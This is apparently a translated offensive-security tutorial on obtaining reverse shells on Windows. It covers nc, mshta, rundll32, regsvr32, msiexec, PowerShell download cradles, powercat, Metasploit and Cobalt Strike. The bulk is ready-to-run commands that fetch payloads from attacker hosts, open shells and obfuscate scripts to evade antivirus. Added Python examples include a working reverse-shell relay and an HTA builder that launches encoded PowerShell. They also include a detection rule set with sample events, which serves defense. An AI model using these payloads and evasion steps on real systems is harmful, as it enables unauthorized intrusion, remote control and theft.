Table of contents
- Reverse shell introduction
- Common reverse shell methods
  - NetCat (nc)
    - Bind shell with nc
    - Reverse shell with nc
  - mshta.exe
    - MSF modules
      - Method 1 (msfconsole)
      - Method 2 (msfvenom)
    - Cobalt Strike
    - HTA attack source code
  - rundll32.exe
    - MSF modules
      - Method 1 (msfconsole)
      - Method 2 (msfvenom)
    - rundll32 loading an HTA
  - regsvr32.exe
    - MSF modules
  - msiexec.exe
    - MSF modules
  - PowerShell scripts
    - PowerShell loading a remote script
    - PowerShell version of nc (powercat)
  - Reverse shell via web delivery
    - Generated with msfconsole
    - Generated with Cobalt Strike
  - Executing a .vbs file with PowerShell
  - Executing a .bat file with PowerShell
- Bypassing antivirus software
  - Procedure
Reverse shell introduction
A reverse shell gives us a remote command console on the target, through which we can issue instructions and control the asset. Shells of this kind come in two directions:
- Bind shell (forward): the target listens, and the attacker's machine sends the connection request to it. Inbound connections are blocked by firewalls, NAT and routing far more often than outbound ones, so this direction frequently fails.
- Reverse shell: the target actively connects out to a listener on the attacker's machine. Outbound connections are usually allowed, which is exactly why this direction sidesteps most firewall and routing restrictions.
Common reverse shell methods
NetCat (nc)
Windows does not ship with nc, so to use it you first have to upload an nc build to the target (find one online). Once it is on the box, either cd into the directory you downloaded it to or add that directory to PATH. Note that not every nc build supports -e (the OpenBSD netcat installed by default on Debian and Ubuntu does not; ncat and the common Windows builds do), so check before relying on it.
Bind shell with nc
In the bind (forward) case the target is set up first and waits for the attacker to connect. So the listener command runs on the target, and the connect command runs on the attacker's machine.
# target side
# listen (-l) verbosely (-vv) on the given port (-p) and, once a client connects, run the given program (-e) with its stdin/stdout wired to the socket
nc -lvvp <port> -e <program>
# for example, expose a local PowerShell on port 6543; whoever connects to 6543 gets to use it
nc -lvvp 6543 -e powershell.exe
# attacker side (the target in this example is 192.168.1.251)
nc <target IP> <port>
nc 192.168.1.251 6543
powershell.exe above can be replaced with cmd.exe.
Reverse shell with nc
The reverse case is the mirror image: the listener now runs on the attacker's machine, and the target actively connects to it.
# attacker side
nc -lvvp <port>
# for example
nc -lvvp 4567
# target side (the listener in this example is at 192.168.1.169)
nc -e <program> <attacker IP> <port>
# for example
nc -e cmd.exe 192.168.1.169 4567
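To make concrete what the two nc commands do, and as a fallback when the nc build on the target lacks -e, here is an added example that is not part of the original post: a Python reimplementation of `nc -lvvp PORT` (listener) and `nc -e SHELL HOST PORT` (target side, which connects out, spawns the shell and relays its stdin/stdout over the socket). The `/bin/sh` default on non-Windows hosts, the loopback self-test and the function names are the example's own assumptions.

```python
# Added example: a minimal listener and a 'nc -e' style reverse shell, to show
# what the two nc commands above actually do. Not part of the original post.
import os
import socket
import subprocess
import threading

# cmd.exe on Windows targets; /bin/sh elsewhere (assumption for the demo)
DEFAULT_SHELL = "cmd.exe" if os.name == "nt" else "/bin/sh"


def listen_once(host="0.0.0.0", port=0):
    """Attacker side, the equivalent of `nc -lvvp PORT`: bind and listen.
    port=0 lets the OS pick a free port; read it back with getsockname()."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def reverse_shell(host, port, shell=DEFAULT_SHELL):
    """Target side, the equivalent of `nc -e SHELL HOST PORT`.

    Connects out to the listener, starts the shell with pipes, and relays
    socket -> shell stdin and shell stdout/stderr -> socket in two threads.
    Pipes and threads are used instead of dup2() on the socket descriptor so
    the same code works on Windows, where a socket handle cannot be passed to
    the child as a standard handle. Returns the shell's exit code."""
    sock = socket.create_connection((host, port))
    proc = subprocess.Popen(shell, stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT, bufsize=0)

    def sock_to_stdin():
        # everything the operator types goes to the shell's stdin
        try:
            while True:
                data = sock.recv(4096)
                if not data:          # listener closed the connection
                    break
                proc.stdin.write(data)
        except OSError:
            pass
        finally:
            try:
                proc.stdin.close()    # EOF on stdin makes the shell exit
            except OSError:
                pass

    def stdout_to_sock():
        # everything the shell prints goes back over the socket
        try:
            while True:
                chunk = proc.stdout.read(4096)  # unbuffered pipe: returns as soon as data arrives
                if not chunk:         # shell exited and closed the pipe
                    break
                sock.sendall(chunk)
        except OSError:
            pass
        finally:
            try:
                sock.shutdown(socket.SHUT_WR)   # tell the listener we are done
            except OSError:
                pass

    t_in = threading.Thread(target=sock_to_stdin, daemon=True)
    t_out = threading.Thread(target=stdout_to_sock, daemon=True)
    t_in.start()
    t_out.start()
    rc = proc.wait()
    t_out.join()
    try:
        sock.shutdown(socket.SHUT_RDWR)  # wakes the blocked recv() in t_in
    except OSError:
        pass
    t_in.join()
    sock.close()
    return rc


def demo_loopback(command="echo reverse-shell-ok", shell=DEFAULT_SHELL):
    """Self-test: both halves on 127.0.0.1 in one process. The 'attacker' sends
    one command followed by exit and returns everything the shell sent back."""
    srv = listen_once("127.0.0.1", 0)
    port = srv.getsockname()[1]
    target = threading.Thread(target=reverse_shell, args=("127.0.0.1", port, shell))
    target.start()
    conn, _ = srv.accept()
    conn.sendall((command + "\nexit\n").encode())
    received = b""
    while True:
        data = conn.recv(4096)
        if not data:
            break
        received += data
    conn.close()
    srv.close()
    target.join()
    return received.decode(errors="replace")


if __name__ == "__main__":
    print(demo_loopback(), end="")
```

The relay is deliberately two threads rather than a dup2() of the socket onto the shell's descriptors: that is what a Windows port has to do anyway, and it is why the traffic of such a shell is plain text on the wire, which is what a network sensor sees.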
mshta.exe
mshta.exe is the Windows component that interprets and runs HTA (HTML Application) files: HTML pages whose embedded JScript or VBScript runs as a normal local program, outside the browser sandbox. Because it ships with every Windows install, we can use it to execute an .hta payload that gives us a reverse shell.
MSF modules
Method 1 (msfconsole)
Module: exploit/windows/misc/hta_server
# select the module
use exploit/windows/misc/hta_server
SRVHOST and SRVPORT matter here because the module starts a web server that the target fetches the HTA from; they set the IP address and port that server binds to. The default SRVHOST of 0.0.0.0 binds to every local address.
set srvhost <local IP>
# the payload I use is windows/x64/meterpreter/reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp
# the default target is x86; select the x64 target
set target 1
# the attacker IP the payload should call back to
set lhost 192.168.1.200
# start the server and the handler
run
Once started, the module prints the URL it is serving; getting the target to execute
mshta http://192.168.1.200:8080/PgE4ymVU3VQ.hta
brings the target machine online.
Method 2 (msfvenom)
msfvenom can also produce .hta files.
# generate the payload file
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=4456 -f hta-psh -o 1.hta
# serve it with a simple web server (the download URL is then http://192.168.1.200:6123/1.hta)
python3 -m http.server 6123
# in msfconsole, start the listener
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 4456
The target then executes
mshta http://192.168.1.200:6123/1.hta
and comes online.
Cobalt Strike
Besides MSF, Cobalt Strike can also generate and serve HTA files.
First choose the HTML Application option under backdoor generation and generate the .hta file. Then host it with the file download option of the phishing tools so the target can fetch it. After that the target only needs to execute
mshta http://43.128.11.131:8081/download/file.ext
to come online.
Note: the HTA generated here is 32-bit and may have trouble on 64-bit hosts; for 64-bit targets the MSF-generated payload is the safer choice.
HTA attack source code
Reading the .hta generated by MSF above shows that the attack ultimately calls PowerShell to perform the reverse shell, with a layer of obfuscation added to lower the chance of antivirus detection.
rundll32.exe
Anyone who has used Python knows its power comes from its libraries: to generate a random number you just call the random module. Windows has an equivalent in the Dynamic Link Library (DLL), a library that packages code and data so that different programs can call it. rundll32.exe is the Windows program built to load a DLL and call one of its exported functions, which is exactly what makes it useful for running a DLL payload.
MSF modules
Method 1 (msfconsole)
Module: exploit/windows/smb/smb_delivery. Run msfconsole as root here, because the module serves the DLL over SMB on port 445 and only root may bind ports below 1024.
# select the module
use exploit/windows/smb/smb_delivery
# the DLL is served over SMB (port 445) by default
# the attacker IP the payload should call back to
set lhost 192.168.1.200
# port 4444 was already in use on my machine, so pick another
set lport 4454
run
The module prints the rundll32.exe command to run on the target, in the form
rundll32.exe \\192.168.1.200\kbFWW\test.dll,0
Method 2 (msfvenom)
# generate the DLL on the attacker machine
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=5333 -f dll -o test.dll
# serve it over HTTP (the port must match the URL used below)
python3 -m http.server 7789
# start the listener in msfconsole
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 5333
# on the target, download the file (certutil is the native Windows certificate tool; I covered it in my post on common file transfer methods for Windows penetration testing)
certutil.exe -urlcache -split -f http://192.168.1.200:7789/test.dll
# execute the DLL; use an absolute path, quoted if it contains spaces
rundll32 shell32.dll,Control_RunDLL "C:\penetration test tools\test.dll"
rundll32 loading an HTA
rundll32 can load not only DLLs but also HTA files.
# same port 5333 as above, so the existing listener is reused
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=5333 -f hta-psh > 1.hta
# transfer the payload to the target as above
certutil.exe -urlcache -split -f http://192.168.1.200:7785/1.hta
# call OpenURL in url.dll to execute it
rundll32.exe url.dll,OpenURL C:\Users\xunmi\1.hta
regsvr32.exe
regsvr32 is another DLL-related program: it registers and unregisters OLE controls in the Windows registry, where OLE (Object Linking and Embedding) controls means DLLs and ActiveX controls. It lives in %SystemRoot%\System32 (C:\Windows\System32) by default.
| Common regsvr32 switch | Role |
|---|---|
| /u | Unregister the server |
| /i | Call DllInstall, passing it an optional [cmdline]; combined with /u it calls DllInstall for uninstall |
| /n | Do not call DllRegisterServer; must be used together with /i |
| /s | Silent; do not display message boxes |
MSF modules
Module: exploit/multi/script/web_delivery
use exploit/multi/script/web_delivery
# target 3 makes the module emit a regsvr32 command
set target 3
# choose the payload
set payload windows/x64/meterpreter/reverse_tcp
# the attacker IP the payload should call back to
set lhost 192.168.1.200
# set lport and srvport according to which ports are free on your machine, then start it
run
msiexec.exe
msiexec.exe is the Windows Installer engine, the program that installs .msi (Microsoft Installer) packages. As I wrote in my Windows AlwaysInstallElevated post, when an administrator has misconfigured that policy we can use an .msi installer to execute commands with elevated privileges; readers who are interested can look there.
MSF modules
Here msfvenom generates an MSI package.
# same payload as before
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=4578 -f msi > 1.msi
# serve it for download
python3 -m http.server 6542
# start the listener in msfconsole
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 4578
# on the target, download and install in one step (/i installs the package, /q runs quietly with no UI)
msiexec /q /i http://192.168.1.200:6542/1.msi
PowerShell scripts
Many of the reverse shell commands above end up calling PowerShell. As the source of the mshta.exe payload showed, most of the reverse shell payloads we generate are, at bottom, PowerShell scripts wearing different skins.
PowerShell loading a remote script
# generate a PowerShell reverse shell script
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=4578 -f psh-reflection -o shell.ps1
# serve it for download
python3 -m http.server 6542
# on the target: hidden window, execution policy bypassed, script fetched and run in memory with IEX so nothing touches disk
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.200:6542/shell.ps1')"
Running this from cmd.exe on the target spawns a powershell.exe child process under cmd.exe, and that child executes the reverse shell.
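The "different skins" point, and the HTA attack source section above, can be made concrete. The following is an added example, not code from the original post and not Metasploit's hta-psh generator: it builds a bare HTA of the same shape (a VBScript block that launches a hidden powershell.exe with -EncodedCommand) and contains the encoder and decoder for that argument. The decoder is the defender's half: given a process command line or the HTA body, it recovers the script. One encoding detail matters in practice: -EncodedCommand expects base64 of the UTF-16LE bytes of the script, so `echo ... | base64` on Linux produces something PowerShell rejects. The list of abbreviations in the regex is an assumption (PowerShell accepts any unambiguous prefix of -EncodedCommand; the list covers the usual spellings).

```python
# Added example: the HTA-wraps-PowerShell pattern and the -EncodedCommand
# encoding, with the decoder a defender needs. Not part of the original post
# and not Metasploit's hta-psh generator; the HTA below is the bare shape.
import base64
import re


def encode_powershell(script: str) -> str:
    """Build the -EncodedCommand argument: base64 of the UTF-16LE bytes.
    base64 of UTF-8 (what `base64` on Linux gives you) is NOT accepted."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Inverse of encode_powershell; raises ValueError on bad input."""
    return base64.b64decode(encoded, validate=True).decode("utf-16-le")


def build_hta(script: str) -> str:
    """Unobfuscated HTA that launches powershell hidden with the encoded script.
    Same structure as the MSF output discussed above (WScript.Shell.Run from a
    VBScript block); MSF adds obfuscation on top of this."""
    cmd = "powershell.exe -nop -w hidden -e " + encode_powershell(script)
    lines = [
        '<html><head><script language="VBScript">',
        'Set sh = CreateObject("WScript.Shell")',
        'sh.Run "%s", 0, False' % cmd,   # 0 = hidden window, False = do not wait
        "self.close",
        "</script></head><body></body></html>",
    ]
    return "\n".join(lines) + "\n"


# Common spellings of -EncodedCommand (assumption: PowerShell accepts any
# unambiguous prefix; this list covers the ones usually seen).
ENCODED_RE = re.compile(
    r"[-/]e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def extract_encoded(command_line: str):
    """Defender side: find an -EncodedCommand argument in a process command
    line (or an HTA body) and return the decoded script, or None if there is
    none or it does not decode as UTF-16LE base64."""
    match = ENCODED_RE.search(command_line)
    if not match:
        return None
    try:
        return decode_powershell(match.group(1))
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    cradle = ("IEX (New-Object Net.WebClient).DownloadString("
              "'http://192.168.1.200:6542/shell.ps1')")
    hta = build_hta(cradle)
    print(hta)
    print(extract_encoded(hta))
```

The encoded form of any script starting with "IEX " begins with SQBFAFgAIAA, which is why that prefix turns up so often in detection rules; the decoder above is what you run on a 4688 or Sysmon command line to see what such a payload actually does.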
PowerShell version of nc (powercat)
Open source download: github.com/besimorhino… . First the script has to be reachable from the target, either uploaded to it or hosted on a web server as below.
# start an nc listener on the attacker machine
nc -lvvp 12345
# on the target, load the script from the web server and connect back to the listener
powershell -c "IEX (New-Object System.Net.WebClient).DownloadString('http://43.128.11.131:8000/powercat.ps1'); powercat -c 192.168.1.200 -p 12345 -e cmd"
Reverse shell via web delivery
Generated with msfconsole
Module: exploit/multi/script/web_delivery
use exploit/multi/script/web_delivery
# general configuration; target 2 makes the module emit a PowerShell one-liner
set payload windows/x64/meterpreter/reverse_tcp
set target 2
set lhost 192.168.1.200
set lport 8525
run
Generated with Cobalt Strike
The specific usage is shown in the figure below; all that remains is to find a way to get the generated command executed on the target machine.
Executing a .vbs file with PowerShell
To run a .vbs file we need the Windows Script Host, cscript.exe (console) or wscript.exe (windowed), which executes WSF, JScript and VBScript scripts.
# first generate the .vbs script
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.200 LPORT=7777 -f vbs -o 1.vbs
# serve it for download
python3 -m http.server 6542
# start the listener
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 7777
# on the target, download it to %TEMP% and run it ('$env:temp' inside single quotes would not expand, so the path is built with Join-Path)
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.200:6542/1.vbs', (Join-Path $env:TEMP 'test.vbs')); Start-Process cscript.exe -ArgumentList (Join-Path $env:TEMP 'test.vbs')"
Executing a .bat file with PowerShell
.bat is the Windows batch file format; Windows runs it directly, so in theory this should be the most convenient route, but I did not manage to reproduce this method successfully.
# first generate the .bat script
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=192.168.1.200 LPORT=7788 -o 1.bat
# serve it for download
python3 -m http.server 6542
# start the listener
handler -p cmd/windows/powershell_reverse_tcp -H 192.168.1.200 -P 7788
# on the target, the two variants I tried (the trailing 1.bat in the first tries to run a file of that name from the current directory)
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.200:6542/1.bat'); 1.bat"
powershell -c "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.200:6542/1.bat')"
Bypassing antivirus software
Procedure
Here I mainly use the PowerShell module Invoke-Obfuscation to obfuscate the script.
# relax the execution policy so our scripts can run
powershell.exe -ep bypass
# load the module
Import-Module ./Invoke-Obfuscation.psd1
# start it
Invoke-Obfuscation
Point it at the source file to obfuscate:
SET SCRIPTPATH I:\penetration test\temporary files\source reverse shell code.ps1
Choose the obfuscation mode:
TOKEN\ALL
1
# or, with the same effect
TOKEN\ALL\1
Write out the obfuscated file:
OUT I:\penetration test\temporary files\obfuscated code.ps1
Comparing the two files shows the principle: token obfuscation rewrites the individual tokens of the original script (randomised case, strings split and concatenated, backticks inserted, variables renamed), so the keyword sequences that antivirus signatures match no longer appear in the file. Bear in mind what this does and does not defeat: it beats static scanning of the file on disk, but AMSI and PowerShell script block logging (event 4104) see the code PowerShell eventually executes, so engines hooking those see through much of it. Besides TOKEN, Invoke-Obfuscation offers many other obfuscation and encoding options.
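Every technique on this page leaves the same kind of trace: a signed Windows binary (mshta, rundll32, regsvr32, msiexec, certutil, cscript, powershell) started with an unusual command line, frequently with powershell.exe as a child of one of the others, and obfuscating the PowerShell body changes none of that. The following is an added example of the detection side, not from the original post: a handful of rules over process-creation records of the kind Sysmon event 1 or Security event 4688 produce, run against constructed sample events modelled on the commands in this post, two of them benign. The record layout, rule names, the regsvr32 command line (the shape web_delivery's Regsvr32 target emits) and the sample data are assumptions of the example.

```python
# Added example: flag the LOLBin launch patterns used on this page in
# process-creation telemetry. Rule set, record layout and samples are the
# example's own assumptions, not part of the original post.
import re
from dataclasses import dataclass
from typing import List


@dataclass
class ProcEvent:
    """The fields of a Sysmon event 1 / Security 4688 record that we need."""
    image: str            # full path of the new process
    command_line: str
    parent_image: str = ""


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# (rule name, image names it applies to, pattern over the command line)
RULES = [
    ("mshta fetching remote or inline content", {"mshta.exe"},
     re.compile(r"https?://|\\\\[\w.-]+\\|vbscript:|javascript:", re.I)),
    ("rundll32 via url.dll, UNC path or user-writable DLL", {"rundll32.exe"},
     re.compile(r"url\.dll,\s*OpenURL|\\\\[\w.-]+\\|"
                r"\\(?:Temp|Downloads|Public|AppData)\\[^,]*\.(?:dll|hta)", re.I)),
    ("regsvr32 loading a remote scriptlet", {"regsvr32.exe"},
     re.compile(r"/i:\s*https?://|scrobj\.dll", re.I)),
    ("msiexec installing a package from a URL", {"msiexec.exe"},
     re.compile(r"/i\s+https?://", re.I)),
    ("certutil used as a downloader", {"certutil.exe"},
     re.compile(r"-urlcache", re.I)),
    ("powershell download cradle, encoded command or hidden window",
     {"powershell.exe", "pwsh.exe"},
     re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biex\b|"
                r"Invoke-Expression|-e(?:c|n|nc|ncoded|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|"
                r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("script host running a script from a temp directory",
     {"cscript.exe", "wscript.exe"},
     re.compile(r'\\Temp\\[^\s"]*\.(?:vbs|js|wsf)', re.I)),
]

# Parents that have no business starting a shell on a workstation.
SCRIPT_PARENTS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe",
                  "cscript.exe", "wscript.exe", "winword.exe", "excel.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def evaluate(event: ProcEvent) -> List[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    hits = []
    image = basename(event.image)
    for name, images, pattern in RULES:
        if image in images and pattern.search(event.command_line):
            hits.append(name)
    parent = basename(event.parent_image)
    if image in SHELLS and parent in SCRIPT_PARENTS:
        hits.append(f"{image} spawned by {parent}")
    return hits


def scan(events):
    """Pair each suspicious event with its hits; benign events are dropped."""
    results = []
    for event in events:
        hits = evaluate(event)
        if hits:
            results.append((event, hits))
    return results


S32 = "C:\\Windows\\System32\\"
# Constructed samples modelled on the commands in this post (not real telemetry).
SAMPLE_EVENTS = [
    ProcEvent(S32 + "mshta.exe", "mshta http://192.168.1.200:8080/PgE4ymVU3VQ.hta", S32 + "cmd.exe"),
    ProcEvent(S32 + "rundll32.exe", r"rundll32.exe \\192.168.1.200\kbFWW\test.dll,0", S32 + "cmd.exe"),
    ProcEvent(S32 + "rundll32.exe", r"rundll32.exe url.dll,OpenURL C:\Users\xunmi\1.hta", S32 + "cmd.exe"),
    ProcEvent(S32 + "regsvr32.exe", "regsvr32 /s /n /u /i:http://192.168.1.200:8080/abc.sct scrobj.dll", S32 + "cmd.exe"),
    ProcEvent(S32 + "msiexec.exe", "msiexec /q /i http://192.168.1.200:6542/1.msi", S32 + "cmd.exe"),
    ProcEvent(S32 + "certutil.exe", "certutil.exe -urlcache -split -f http://192.168.1.200:7789/test.dll", S32 + "cmd.exe"),
    ProcEvent(S32 + "WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell.exe -nop -w hidden -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
              S32 + "mshta.exe"),
    # benign: a control panel applet and an admin's one-off query
    ProcEvent(S32 + "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL desk.cpl", "C:\\Windows\\explorer.exe"),
    ProcEvent(S32 + "WindowsPowerShell\\v1.0\\powershell.exe", "powershell.exe -NoProfile -Command Get-Service", "C:\\Windows\\explorer.exe"),
]

if __name__ == "__main__":
    for event, hits in scan(SAMPLE_EVENTS):
        print(f"{basename(event.image):15} {'; '.join(hits)}")
```

The parent-child rule is the one that survives obfuscation best: whatever Invoke-Obfuscation does to the script body, mshta.exe or rundll32.exe starting powershell.exe is still visible in the process tree, which is why the rules match on image and parent image rather than on strings inside the payload.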